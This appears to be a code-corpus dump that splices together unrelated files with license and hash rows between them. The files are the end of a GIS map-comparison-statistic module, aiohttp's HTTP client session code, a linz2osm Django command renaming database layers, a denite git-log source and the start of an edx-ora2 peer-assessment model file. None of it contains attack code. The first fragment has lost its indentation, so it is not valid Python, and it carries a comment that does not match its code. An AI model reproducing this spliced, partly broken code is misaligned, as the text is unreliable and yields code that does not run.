all_jaccards.index = np.arange(0, len(all_jaccards.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_jaccards
def compute_mcs(a, b):
""" Compute MCS between vectors a and b.
:param a numeric vector.
:param b numeric vector.
:return ndarray of computed MCS scores.
"""
assert len(a) == len(b), "Vectors a and b must be of same length"
N = len(a)
# Create an array filled with -1s to store the MCS.
mcs = 0
nans = False
for i in range(0, N):
if np.isnan(a[i]) or np.isnan(b[i]):
nans = True
else:
# If eiher a or b is 0, do nothing as division would fail
if a[i] == 0.0 or b[i] == 0.0:
pass
else:
abs_subs = np.abs(a[i] - b[i]) / np.max([a[i], b[i]])
mcs += abs_subs
if nans:
print("WARNING: a and/or b contain NaNs")
return mcs / N
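# Illustrative sketch, not part of the original module: compute_mcs() operates
# on plain numeric vectors, so it can be checked without any vector features.
# The values below are hypothetical.
def _demo_compute_mcs():
    a = [1.0, 2.0, 4.0]
    b = [1.0, 1.0, 2.0]
    # Differences: 0, |2-1|/2 = 0.5 and |4-2|/4 = 0.5, averaged over 3 cells.
    return compute_mcs(a, b)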
def cross_mcs(input_vectors, value_fields, verbose=False, logger=None):
""" Compute map comparison statistics between input vector features.
MCS (Map Comparison Statistic) indicates the average difference between any
pair of feature polygon values, expressed as a fraction of the highest
value. MCS is calculated between each polygon in the input vector features
and it is required (and checked) that all the inputs are based on the
same vector feature.
For another application of MCS, see:
Schulp, C. J. E., Burkhard, B., Maes, J., Van Vliet, J., & Verburg, P. H.
(2014). Uncertainties in Ecosystem Service Maps: A Comparison on the
European Scale. PLoS ONE, 9(10), e109643.
http://doi.org/10.1371/journal.pone.0109643
:param input_vectors list of input vector paths.
    :param value_fields list of String names indicating which fields contain
the values to be compared.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:return list of GeoPandas Dataframe with MCS between all rasters in field
"mcs".
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_mcs')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_vectors) > 1, "More than one input vector needed"
assert len(value_fields) == len(input_vectors), "One value field per vector feature needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING MCS SCORES **]")
all_mcs = pd.DataFrame({"feature1": [], "feature2": [],
"mcs": []})
n_vectors = len(input_vectors)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_vectors * n_vectors - n_vectors) / 2)
no_computation = 1
for i in range(0, n_vectors):
# Read in the data as a GeoPandas dataframe
vector1_path = input_vectors[i]
vector1 = gpd.read_file(vector1_path)
for j in range(i+1, n_vectors):
vector2_path = input_vectors[j]
vector2 = gpd.read_file(vector2_path)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating MCS ".format(prefix) +
"between {} ".format(vector1_path) +
"and {}".format(vector2_path)))
a = vector1[value_fields[i]]
b = vector2[value_fields[j]]
mcs_value = compute_mcs(a, b)
mcs = pd.DataFrame({"feature1": [vector1_path],
"feature2": [vector2_path],
"mcs": [mcs_value]})
all_mcs = pd.concat([all_mcs, mcs])
no_computation += 1
all_mcs.index = np.arange(0, len(all_mcs.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_mcs
def plu_variation(input_files, input_codes, logger=None):
""" Compute per planning unit (PLU) variation statistics.
    Given a list of input features describing the same planning units,
calculate statistics based on defined field names.
:param input_files: String list of paths to input (vector) features.
:param input_codes: String list of field names corresponding to each
input feature. The statistics will calculated based on
these fields.
:param logger: Logger object.
:return: GeoPandas DataFrame object.
"""
# Set up logging
if not logger:
logging.basicConfig()
llogger = logging.getLogger('plu_variation')
llogger.setLevel(logging.INFO)
else:
llogger = logger
n_features = len(input_files)
# Create an empty DataFrame to store the rank priority cols
rank_values = pd.DataFrame({'NUTS_ID': []})
llogger.info("[1/2] Reading in {} features...".format(n_features))
for i, feature_file in enumerate(input_files):
feature_code = input_codes[i]
prefix = utils.get_iteration_prefix(i+1, n_features)
llogger.debug("{0} Processing feature {1}".format(prefix,
feature_file))
# Read in the feature as GeoPandas dataframe
feat_data = gpd.read_file(feature_file)
# Two different field names are used to store the mean rank
# information: "_mean" for geojson-files and 'Men_rnk' for
# shapefiles. Figure out which is currently used.
if '_mean' in feat_data.columns:
mean_field = '_mean'
elif 'Men_rnk' in feat_data.columns:
mean_field = 'Men_rnk'
else:
llogger.error("Field '_mean' or 'Men_rnk' not found")
raise ValueError
# On first iteration, also get the NUTS_ID column
        if i == 0:
rank_values['NUTS_ID'] = feat_data['NUTS_ID']
# Get the rank priority column and place if the store DataFrame
rank_values[feature_code] = feat_data[mean_field]
llogger.info("[2/2] Calculating mean and STD...")
# Read in the first input feature to act as a template.
output_feature = gpd.read_file(input_files[0])
# Only take one field: NUTS_ID
output_feature = output_feature[['geometry', 'NUTS_ID']]
# Merge with the collected data
output_feature = output_feature.merge(rank_values, on='NUTS_ID')
# Calculate mean
agg_means = output_feature.mean(1)
# Calculate STD
agg_stds = output_feature.std(1)
output_feature['agg_mean'] = agg_means
output_feature['agg_std'] = agg_stds
return output_feature
|
mit
| -3,889,173,436,250,582,000 | 41.169374 | 108 | 0.592737 | false | 3.941661 | false | false | false |
jashandeep-sohi/aiohttp
|
aiohttp/client.py
|
1
|
25360
|
"""HTTP Client for asyncio."""
import asyncio
import base64
import hashlib
import os
import sys
import traceback
import warnings
import http.cookies
import urllib.parse
import aiohttp
from .client_reqrep import ClientRequest, ClientResponse
from .errors import WSServerHandshakeError
from .multidict import MultiDictProxy, MultiDict, CIMultiDict, upstr
from .websocket import WS_KEY, WebSocketParser, WebSocketWriter
from .websocket_client import ClientWebSocketResponse
from . import hdrs
__all__ = ('ClientSession', 'request', 'get', 'options', 'head',
'delete', 'post', 'put', 'patch', 'ws_connect')
PY_35 = sys.version_info >= (3, 5)
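# Typical usage of the session API defined below (illustrative sketch; see also
# the example in the request() docstring near the end of this module):
#
#     session = ClientSession(loop=loop)
#     resp = yield from session.get('http://python.org/')
#     data = yield from resp.read()
#     session.close()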
class ClientSession:
"""First-class interface for making HTTP requests."""
_source_traceback = None
_connector = None
def __init__(self, *, connector=None, loop=None, cookies=None,
headers=None, skip_auto_headers=None,
auth=None, request_class=ClientRequest,
response_class=ClientResponse,
ws_response_class=ClientWebSocketResponse,
version=aiohttp.HttpVersion11):
if connector is None:
connector = aiohttp.TCPConnector(loop=loop)
loop = connector._loop # never None
else:
if loop is None:
loop = connector._loop # never None
elif connector._loop is not loop:
raise ValueError("loop argument must agree with connector")
self._loop = loop
if loop.get_debug():
self._source_traceback = traceback.extract_stack(sys._getframe(1))
self._cookies = http.cookies.SimpleCookie()
        # For backward compatibility with `share_cookies` connectors
if connector._share_cookies:
self._update_cookies(connector.cookies)
if cookies is not None:
self._update_cookies(cookies)
self._connector = connector
self._default_auth = auth
self._version = version
# Convert to list of tuples
if headers:
headers = CIMultiDict(headers)
else:
headers = CIMultiDict()
self._default_headers = headers
if skip_auto_headers is not None:
self._skip_auto_headers = frozenset([upstr(i)
for i in skip_auto_headers])
else:
self._skip_auto_headers = frozenset()
self._request_class = request_class
self._response_class = response_class
self._ws_response_class = ws_response_class
def __del__(self, _warnings=warnings):
if not self.closed:
self.close()
_warnings.warn("Unclosed client session {!r}".format(self),
ResourceWarning)
context = {'client_session': self,
'message': 'Unclosed client session'}
if self._source_traceback is not None:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
def request(self, method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
read_until_eof=True):
"""Perform HTTP request."""
return _RequestContextManager(
self._request(
method,
url,
params=params,
data=data,
headers=headers,
skip_auto_headers=skip_auto_headers,
auth=auth,
allow_redirects=allow_redirects,
max_redirects=max_redirects,
encoding=encoding,
version=version,
compress=compress,
chunked=chunked,
expect100=expect100,
read_until_eof=read_until_eof))
@asyncio.coroutine
def _request(self, method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
read_until_eof=True):
if version is not None:
warnings.warn("HTTP version should be specified "
"by ClientSession constructor", DeprecationWarning)
else:
version = self._version
if self.closed:
raise RuntimeError('Session is closed')
redirects = 0
history = []
if not isinstance(method, upstr):
method = upstr(method)
# Merge with default headers and transform to CIMultiDict
headers = self._prepare_headers(headers)
if auth is None:
auth = self._default_auth
# It would be confusing if we support explicit Authorization header
# with `auth` argument
if (headers is not None and
auth is not None and
hdrs.AUTHORIZATION in headers):
raise ValueError("Can't combine `Authorization` header with "
"`auth` argument")
skip_headers = set(self._skip_auto_headers)
if skip_auto_headers is not None:
for i in skip_auto_headers:
skip_headers.add(upstr(i))
while True:
req = self._request_class(
method, url, params=params, headers=headers,
skip_auto_headers=skip_headers, data=data,
cookies=self.cookies, encoding=encoding,
auth=auth, version=version, compress=compress, chunked=chunked,
expect100=expect100,
loop=self._loop, response_class=self._response_class)
conn = yield from self._connector.connect(req)
try:
resp = req.send(conn.writer, conn.reader)
try:
yield from resp.start(conn, read_until_eof)
except:
resp.close()
conn.close()
raise
except (aiohttp.HttpProcessingError,
aiohttp.ServerDisconnectedError) as exc:
raise aiohttp.ClientResponseError() from exc
except OSError as exc:
raise aiohttp.ClientOSError(*exc.args) from exc
self._update_cookies(resp.cookies)
            # For backward compatibility with `share_cookies` connectors
if self._connector._share_cookies:
self._connector.update_cookies(resp.cookies)
# redirects
if resp.status in (301, 302, 303, 307) and allow_redirects:
redirects += 1
history.append(resp)
if max_redirects and redirects >= max_redirects:
resp.close()
break
else:
# TODO: close the connection if BODY is large enough
# Redirect with big BODY is forbidden by HTTP protocol
# but malformed server may send illegal response.
# Small BODIES with text like "Not Found" are still
# perfectly fine and should be accepted.
yield from resp.release()
# For 301 and 302, mimic IE behaviour, now changed in RFC.
# Details: https://github.com/kennethreitz/requests/pull/269
if resp.status != 307:
method = hdrs.METH_GET
data = None
if headers.get(hdrs.CONTENT_LENGTH):
headers.pop(hdrs.CONTENT_LENGTH)
r_url = (resp.headers.get(hdrs.LOCATION) or
resp.headers.get(hdrs.URI))
scheme = urllib.parse.urlsplit(r_url)[0]
if scheme not in ('http', 'https', ''):
resp.close()
raise ValueError('Can redirect only to http or https')
elif not scheme:
r_url = urllib.parse.urljoin(url, r_url)
url = r_url
yield from resp.release()
continue
break
resp._history = tuple(history)
return resp
def ws_connect(self, url, *,
protocols=(),
timeout=10.0,
autoclose=True,
autoping=True,
auth=None,
origin=None):
"""Initiate websocket connection."""
return _WSRequestContextManager(
self._ws_connect(url,
protocols=protocols,
timeout=timeout,
autoclose=autoclose,
autoping=autoping,
auth=auth,
origin=origin))
@asyncio.coroutine
def _ws_connect(self, url, *,
protocols=(),
timeout=10.0,
autoclose=True,
autoping=True,
auth=None,
origin=None):
sec_key = base64.b64encode(os.urandom(16))
headers = {
hdrs.UPGRADE: hdrs.WEBSOCKET,
hdrs.CONNECTION: hdrs.UPGRADE,
hdrs.SEC_WEBSOCKET_VERSION: '13',
hdrs.SEC_WEBSOCKET_KEY: sec_key.decode(),
}
if protocols:
headers[hdrs.SEC_WEBSOCKET_PROTOCOL] = ','.join(protocols)
if origin is not None:
headers[hdrs.ORIGIN] = origin
# send request
resp = yield from self.get(url, headers=headers,
read_until_eof=False,
auth=auth)
try:
# check handshake
if resp.status != 101:
raise WSServerHandshakeError(
message='Invalid response status',
code=resp.status,
headers=resp.headers)
if resp.headers.get(hdrs.UPGRADE, '').lower() != 'websocket':
raise WSServerHandshakeError(
message='Invalid upgrade header',
code=resp.status,
headers=resp.headers)
if resp.headers.get(hdrs.CONNECTION, '').lower() != 'upgrade':
raise WSServerHandshakeError(
message='Invalid connection header',
code=resp.status,
headers=resp.headers)
# key calculation
key = resp.headers.get(hdrs.SEC_WEBSOCKET_ACCEPT, '')
match = base64.b64encode(
hashlib.sha1(sec_key + WS_KEY).digest()).decode()
if key != match:
raise WSServerHandshakeError(
message='Invalid challenge response',
code=resp.status,
headers=resp.headers)
# websocket protocol
protocol = None
if protocols and hdrs.SEC_WEBSOCKET_PROTOCOL in resp.headers:
resp_protocols = [
proto.strip() for proto in
resp.headers[hdrs.SEC_WEBSOCKET_PROTOCOL].split(',')]
for proto in resp_protocols:
if proto in protocols:
protocol = proto
break
reader = resp.connection.reader.set_parser(WebSocketParser)
resp.connection.writer.set_tcp_nodelay(True)
writer = WebSocketWriter(resp.connection.writer, use_mask=True)
except Exception:
resp.close()
raise
else:
return self._ws_response_class(reader,
writer,
protocol,
resp,
timeout,
autoclose,
autoping,
self._loop)
def _update_cookies(self, cookies):
"""Update shared cookies."""
if isinstance(cookies, dict):
cookies = cookies.items()
for name, value in cookies:
if isinstance(value, http.cookies.Morsel):
# use dict method because SimpleCookie class modifies value
# before Python 3.4
dict.__setitem__(self.cookies, name, value)
else:
self.cookies[name] = value
def _prepare_headers(self, headers):
""" Add default headers and transform it to CIMultiDict
"""
# Convert headers to MultiDict
result = CIMultiDict(self._default_headers)
if headers:
if not isinstance(headers, (MultiDictProxy, MultiDict)):
headers = CIMultiDict(headers)
added_names = set()
for key, value in headers.items():
if key in added_names:
result.add(key, value)
else:
result[key] = value
added_names.add(key)
return result
def get(self, url, *, allow_redirects=True, **kwargs):
"""Perform HTTP GET request."""
return _RequestContextManager(
self._request(hdrs.METH_GET, url,
allow_redirects=allow_redirects,
**kwargs))
def options(self, url, *, allow_redirects=True, **kwargs):
"""Perform HTTP OPTIONS request."""
return _RequestContextManager(
self._request(hdrs.METH_OPTIONS, url,
allow_redirects=allow_redirects,
**kwargs))
def head(self, url, *, allow_redirects=False, **kwargs):
"""Perform HTTP HEAD request."""
return _RequestContextManager(
self._request(hdrs.METH_HEAD, url,
allow_redirects=allow_redirects,
**kwargs))
def post(self, url, *, data=None, **kwargs):
"""Perform HTTP POST request."""
return _RequestContextManager(
self._request(hdrs.METH_POST, url,
data=data,
**kwargs))
def put(self, url, *, data=None, **kwargs):
"""Perform HTTP PUT request."""
return _RequestContextManager(
self._request(hdrs.METH_PUT, url,
data=data,
**kwargs))
def patch(self, url, *, data=None, **kwargs):
"""Perform HTTP PATCH request."""
return _RequestContextManager(
self._request(hdrs.METH_PATCH, url,
data=data,
**kwargs))
def delete(self, url, **kwargs):
"""Perform HTTP DELETE request."""
return _RequestContextManager(
self._request(hdrs.METH_DELETE, url,
**kwargs))
def close(self):
"""Close underlying connector.
Release all acquired resources.
"""
if not self.closed:
self._connector.close()
self._connector = None
ret = asyncio.Future(loop=self._loop)
ret.set_result(None)
return ret
@property
def closed(self):
"""Is client session closed.
A readonly property.
"""
return self._connector is None or self._connector.closed
@property
def connector(self):
"""Connector instance used for the session."""
return self._connector
@property
def cookies(self):
"""The session cookies."""
return self._cookies
@property
def version(self):
"""The session HTTP protocol version."""
return self._version
def detach(self):
"""Detach connector from session without closing the former.
Session is switched to closed state anyway.
"""
self._connector = None
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
if PY_35:
@asyncio.coroutine
def __aenter__(self):
return self
@asyncio.coroutine
def __aexit__(self, exc_type, exc_val, exc_tb):
yield from self.close()
if PY_35:
from collections.abc import Coroutine
base = Coroutine
else:
base = object
class _BaseRequestContextManager(base):
__slots__ = ('_coro', '_resp')
def __init__(self, coro):
self._coro = coro
self._resp = None
def send(self, value):
return self._coro.send(value)
def throw(self, typ, val=None, tb=None):
if val is None:
return self._coro.throw(typ)
elif tb is None:
return self._coro.throw(typ, val)
else:
return self._coro.throw(typ, val, tb)
def close(self):
return self._coro.close()
@property
def gi_frame(self):
return self._coro.gi_frame
@property
def gi_running(self):
return self._coro.gi_running
@property
def gi_code(self):
return self._coro.gi_code
def __next__(self):
return self.send(None)
@asyncio.coroutine
def __iter__(self):
resp = yield from self._coro
return resp
if PY_35:
def __await__(self):
resp = yield from self._coro
return resp
@asyncio.coroutine
def __aenter__(self):
self._resp = yield from self._coro
return self._resp
if not PY_35:
try:
from asyncio import coroutines
coroutines._COROUTINE_TYPES += (_BaseRequestContextManager,)
except:
pass
class _RequestContextManager(_BaseRequestContextManager):
if PY_35:
@asyncio.coroutine
def __aexit__(self, exc_type, exc, tb):
if exc_type is not None:
self._resp.close()
else:
yield from self._resp.release()
class _WSRequestContextManager(_BaseRequestContextManager):
if PY_35:
@asyncio.coroutine
def __aexit__(self, exc_type, exc, tb):
yield from self._resp.close()
class _DetachedRequestContextManager(_RequestContextManager):
__slots__ = _RequestContextManager.__slots__ + ('_session', )
def __init__(self, coro, session):
super().__init__(coro)
self._session = session
@asyncio.coroutine
def __iter__(self):
try:
return (yield from self._coro)
except:
self._session.close()
raise
if PY_35:
def __await__(self):
try:
return (yield from self._coro)
except:
self._session.close()
raise
def __del__(self):
self._session.detach()
class _DetachedWSRequestContextManager(_WSRequestContextManager):
__slots__ = _WSRequestContextManager.__slots__ + ('_session', )
def __init__(self, coro, session):
super().__init__(coro)
self._session = session
def __del__(self):
self._session.detach()
def request(method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
cookies=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
connector=None,
loop=None,
read_until_eof=True,
request_class=None,
response_class=None):
"""Constructs and sends a request. Returns response object.
:param str method: HTTP method
:param str url: request url
:param params: (optional) Dictionary or bytes to be sent in the query
string of the new request
:param data: (optional) Dictionary, bytes, or file-like object to
send in the body of the request
:param dict headers: (optional) Dictionary of HTTP Headers to send with
the request
:param dict cookies: (optional) Dict object to send with the request
:param auth: (optional) BasicAuth named tuple represent HTTP Basic Auth
:type auth: aiohttp.helpers.BasicAuth
:param bool allow_redirects: (optional) If set to False, do not follow
redirects
:param version: Request HTTP version.
:type version: aiohttp.protocol.HttpVersion
:param bool compress: Set to True if request has to be compressed
with deflate encoding.
:param chunked: Set to chunk size for chunked transfer encoding.
:type chunked: bool or int
:param bool expect100: Expect 100-continue response from server.
:param connector: BaseConnector sub-class instance to support
connection pooling.
:type connector: aiohttp.connector.BaseConnector
:param bool read_until_eof: Read response until eof if response
does not have Content-Length header.
:param request_class: (optional) Custom Request class implementation.
:param response_class: (optional) Custom Response class implementation.
:param loop: Optional event loop.
Usage::
>>> import aiohttp
>>> resp = yield from aiohttp.request('GET', 'http://python.org/')
>>> resp
<ClientResponse(python.org/) [200]>
>>> data = yield from resp.read()
"""
warnings.warn("Use ClientSession().request() instead", DeprecationWarning)
if connector is None:
connector = aiohttp.TCPConnector(loop=loop, force_close=True)
kwargs = {}
if request_class is not None:
kwargs['request_class'] = request_class
if response_class is not None:
kwargs['response_class'] = response_class
session = ClientSession(loop=loop,
cookies=cookies,
connector=connector,
**kwargs)
return _DetachedRequestContextManager(
session._request(method, url,
params=params,
data=data,
headers=headers,
skip_auto_headers=skip_auto_headers,
auth=auth,
allow_redirects=allow_redirects,
max_redirects=max_redirects,
encoding=encoding,
version=version,
compress=compress,
chunked=chunked,
expect100=expect100,
read_until_eof=read_until_eof),
session=session)
def get(url, **kwargs):
warnings.warn("Use ClientSession().get() instead", DeprecationWarning)
return request(hdrs.METH_GET, url, **kwargs)
def options(url, **kwargs):
warnings.warn("Use ClientSession().options() instead", DeprecationWarning)
return request(hdrs.METH_OPTIONS, url, **kwargs)
def head(url, **kwargs):
warnings.warn("Use ClientSession().head() instead", DeprecationWarning)
return request(hdrs.METH_HEAD, url, **kwargs)
def post(url, **kwargs):
warnings.warn("Use ClientSession().post() instead", DeprecationWarning)
return request(hdrs.METH_POST, url, **kwargs)
def put(url, **kwargs):
warnings.warn("Use ClientSession().put() instead", DeprecationWarning)
return request(hdrs.METH_PUT, url, **kwargs)
def patch(url, **kwargs):
warnings.warn("Use ClientSession().patch() instead", DeprecationWarning)
return request(hdrs.METH_PATCH, url, **kwargs)
def delete(url, **kwargs):
warnings.warn("Use ClientSession().delete() instead", DeprecationWarning)
return request(hdrs.METH_DELETE, url, **kwargs)
def ws_connect(url, *, protocols=(), timeout=10.0, connector=None, auth=None,
ws_response_class=ClientWebSocketResponse, autoclose=True,
autoping=True, loop=None, origin=None, headers=None):
warnings.warn("Use ClientSession().ws_connect() instead",
DeprecationWarning)
if loop is None:
loop = asyncio.get_event_loop()
if connector is None:
connector = aiohttp.TCPConnector(loop=loop, force_close=True)
session = aiohttp.ClientSession(loop=loop, connector=connector, auth=auth,
ws_response_class=ws_response_class,
headers=headers)
return _DetachedWSRequestContextManager(
session._ws_connect(url,
protocols=protocols,
timeout=timeout,
autoclose=autoclose,
autoping=autoping,
origin=origin),
session=session)
|
apache-2.0
| -5,988,827,585,146,491,000 | 32.456464 | 79 | 0.536199 | false | 4.763336 | false | false | false |
opennewzealand/linz2osm
|
linz2osm/data_dict/management/commands/update_layer_names.py
|
1
|
4626
|
# LINZ-2-OSM
# Copyright (C) Koordinates Ltd.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from django.core.management.base import BaseCommand
from django.db import transaction, connection, connections
from linz2osm.data_dict.models import Layer, LayerInDataset, Dataset, Tag
RENAMES = {
'breakwtr_cl': 'breakwater_cl',
'cattlstp_pnt': 'cattlestop_pnt',
'cblwy_ind_cl': 'cableway_industrial_cl',
'cblwy_peo_cl': 'cableway_people_cl',
'descrip_text': 'descriptive_text',
'dredg_tl_cl': 'dredge_tailing_cl',
'embankmnt_cl': 'embankment_cl',
'ferry_cr_cl': 'ferry_crossing_cl',
'fish_fm_poly': 'fish_farm_poly',
'floodgte_pnt': 'floodgate_pnt',
'gas_val_pnt': 'gas_valve_pnt',
'geo_name': 'geographic_name',
'gl_lake_poly': 'glacial_lake_poly',
'golf_crs_pnt': 'golf_course_pnt',
'golf_crs_poly': 'golf_course_poly',
'grav_pit_poly': 'gravel_pit_poly',
'hist_ste_pnt': 'historic_site_pnt',
'ice_clf_edge': 'ice_cliff_edge',
'ice_strm_cl': 'ice_stream_pnt',
'marne_fm_cl': 'marine_farm_cl',
'marne_fm_poly': 'marine_farm_poly',
'melt_strm_cl': 'melt_stream_cl',
'moran_wl_poly': 'moraine_wall_poly',
'pumce_pt_poly': 'pumice_pit_poly',
'racetrk_cl': 'racetrack_cl',
'racetrk_pnt': 'racetrack_pnt',
'racetrk_poly': 'racetrack_poly',
'radar_dm_pnt': 'radar_dome_pnt',
'rail_stn_pnt': 'rail_station_pnt',
'reservr_poly': 'reservoir_poly',
'res_area_poly': 'residential_area_poly',
'rifle_rg_poly': 'rifle_range_poly',
'rock_out_pnt': 'rock_outcrop_pnt',
'sat_stn_pnt': 'satellite_station_pnt',
'scatscrb_poly': 'scattered_scrub_poly',
'shelt_blt_cl': 'shelter_belt_cl',
'showgrd_poly': 'showground_poly',
'spillwy_edge': 'spillway_edge',
'sprtfld_poly': 'sportsfield_poly',
'telephn_cl': 'telephone_cl',
'waterfal_edg': 'waterfall_edge',
'waterfal_cl': 'waterfall_cl',
'waterfal_pnt': 'waterfall_pnt',
'waterfal_poly': 'waterfall_poly',
'water_r_cl': 'water_race_cl',
}
class Command(BaseCommand):
help = "Rename layers with old abbreviated names"
def handle(self, **options):
# drop existing layers with new names: only needed if you've run dd_load
# before update_layer_names
# for new_name in RENAMES.values():
# for l in Layer.objects.filter(name=new_name):
# l.delete()
with transaction.commit_on_success():
cursor = connection.cursor()
for old_name, new_name in RENAMES.iteritems():
cursor.execute("UPDATE data_dict_layer SET name = %s WHERE name = %s;", [new_name, old_name])
cursor.execute("UPDATE data_dict_tag SET layer_id = %s WHERE layer_id = %s;", [new_name, old_name])
cursor.execute("UPDATE data_dict_layerindataset SET layer_id = %s WHERE layer_id = %s;", [new_name, old_name])
print 'CONNECTION: default'
for q in connection.queries:
print q['sql']
# the actual layers
for conn_name in connections:
if conn_name != 'default':
conn = connections[conn_name]
with transaction.commit_on_success():
cursor = conn.cursor()
for old_name, new_name in RENAMES.iteritems():
cursor.execute("UPDATE geometry_columns SET f_table_name = %s WHERE f_table_name = %s;", [new_name, old_name])
cursor.execute("SELECT 1 FROM pg_tables WHERE schemaname='public' AND tablename=%s;", [old_name])
old_table_exists = cursor.fetchall()
if old_table_exists:
print "In %s renaming %s to %s" % (conn_name, old_name, new_name)
cursor.execute("ALTER TABLE %s RENAME TO %s;" % (old_name, new_name))
print 'CONNECTION: %s' % (conn_name,)
for q in conn.queries:
print q['sql']
|
gpl-3.0
| 9,209,304,426,773,775,000 | 42.641509 | 134 | 0.610463 | false | 3.138399 | false | false | false |
kmnk/gitn
|
rplugin/python3/denite/source/gitn_log.py
|
1
|
5421
|
# File: gitn_log.py
# Author: kmnk <kmnknmk at gmail.com>
# License: MIT license
from gitn.enum import Window
from gitn.util.gitn import Gitn
from denite.process import Process
import os
import re
import time
from .gitn import Source as Base
DATE_GRAPH_HIGHLIGHT = {
'container': {
'name': 'gitnLog_dateGraphHeader',
'pattern': '\\v((\d{4}\/\d{2}\/\d{2} \d{2}:\d{2} )| {16} )[*|\/\-\ ]+',
},
'containees': [
{
'name': 'gitnLog_date',
'pattern': '\\v\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}',
'color': 'Comment',
'next': 'gitnLog_graph',
},
{
'name': 'gitnLog_graph',
'pattern': '\\v[*|\/\-\\ ]+',
'color': 'Statement',
},
],
}
AUTHOR_NAME_HIGHLIGHT = {
'container': {
'name': 'gitnLog_authorNameHeader',
'pattern': '\\v:[^:]+: ',
},
'containees': [
{
'name': 'gitnLog_separator',
'pattern': '\\v:',
'color': 'Comment',
},
{
'name': 'gitnLog_authorName',
'pattern': '\\v[^:]+',
'color': 'Type',
},
],
}
class Source(Base):
def __init__(self, vim):
super().__init__(vim)
self.name = 'gitn_log'
self.kind = 'gitn_log'
self.vars = {
'command': ['git'],
'action': ['log'],
'default_opts': [
'--date=default',
'--graph',
'--pretty=format:":::%H:::%P:::%an:::%ae:::%ad:::%at:::%cn:::%ce:::%cd:::%ct:::%s:::"',
],
'separator': ['--'],
'file': [],
'window': 'tab',
}
def on_init(self, context):
self.__proc = None
if len(context['args']) >= 1:
self.vars['file'] = [context['args'][0]]
else:
self.vars['file'] = []
if len(context['args']) >= 2:
if Window.has(context['args'][1]):
self.vars['window'] = context['args'][1]
else:
self.vars['window'] = 'tab'
def on_close(self, context):
if self.__proc:
self.__proc.kill()
self.__proc = None
def highlight(self):
Gitn.highlight(self.vim, DATE_GRAPH_HIGHLIGHT)
Gitn.highlight(self.vim, AUTHOR_NAME_HIGHLIGHT)
def define_syntax(self):
self.vim.command(
'syntax region ' + self.syntax_name + ' start=// end=/$/ '
'contains=gitnLog_dateGraphHeader,gitnLog_authorNameHeader,deniteMathced contained')
def gather_candidates(self, context):
if self.__proc:
return self.__async_gather_candidates(context, 0.5)
commands = []
commands += self.vars['command']
commands += self.vars['action']
commands += self.vars['default_opts']
commands += self.vars['separator']
commands += self.vars['file']
self.__proc = Process(commands, context, self.vim.call('expand', context['path']))
return self.__async_gather_candidates(context, 2.0)
def __async_gather_candidates(self, context, timeout):
outs, errs = self.__proc.communicate(timeout=timeout)
context['is_async'] = not self.__proc.eof()
if self.__proc.eof():
self.__proc = None
candidates = []
for line in outs:
result = self.__parse(line)
if result:
if 'subject' in result and result['subject'] != '':
candidates.append({
'word': '{0} {1}: {2} : {3}'.format(
time.strftime('%Y/%m/%d %H:%M', time.gmtime(result['author']['time'])),
result['graph'],
result['author']['name'],
result['subject'],
),
'action__log': result,
'action__path': context['args'][0] if len(context['args']) >= 1 else '',
'action__window': self.vars['window'],
})
elif 'graph' in result:
candidates.append({
'word': ' {0}'.format(result['graph'].strip()),
})
return candidates
def __parse(self, line):
        m = re.search(r'^([*|/\\ ]+)\s?(.+)?$', line)
        if not m: return {}
        [graph, value] = m.groups()
        if not value: return { 'graph': graph }
splited = value.split(':::')
if len(splited) <= 1: return { 'graph': graph }
[own_hash, parent_hash, author_name, author_email, author_date, author_time, committer_name, committer_email, committer_date, committer_time, subject] = splited[1:-1]
return {
'graph': graph,
'subject': subject,
'hash': {
'own': own_hash,
'parent': parent_hash,
},
'author': {
'name': author_name,
'email': author_email,
'date': author_date,
'time': int(author_time, 10),
},
'committer': {
'name': committer_name,
'email': committer_email,
'date': committer_date,
'time': int(committer_time, 10),
},
}
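# Illustrative sketch (not part of the plugin): with the pretty format above, a
# commit line looks roughly like
#   "* :::<hash>:::<parent>:::Alice:::a@example.org:::<date>:::1500000000:::...:::Fix typo:::"
# and __parse() returns {'graph': '* ', 'subject': 'Fix typo', ...}, while a pure
# graph line such as "| |" yields only {'graph': '| |'}.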
|
mit
| 632,974,363,430,759,600 | 29.455056 | 174 | 0.448072 | false | 3.855619 | false | false | false |
Lektorium-LLC/edx-ora2
|
openassessment/assessment/models/peer.py
|
1
|
18730
|
"""
Django models specific to peer assessment.
NOTE: We've switched to migrations, so if you make any edits to this file, you
need to then generate a matching migration for it using:
./manage.py schemamigration openassessment.assessment --auto
"""
import random
from datetime import timedelta
from django.db import models, DatabaseError
from django.utils.timezone import now
from openassessment.assessment.models.base import Assessment
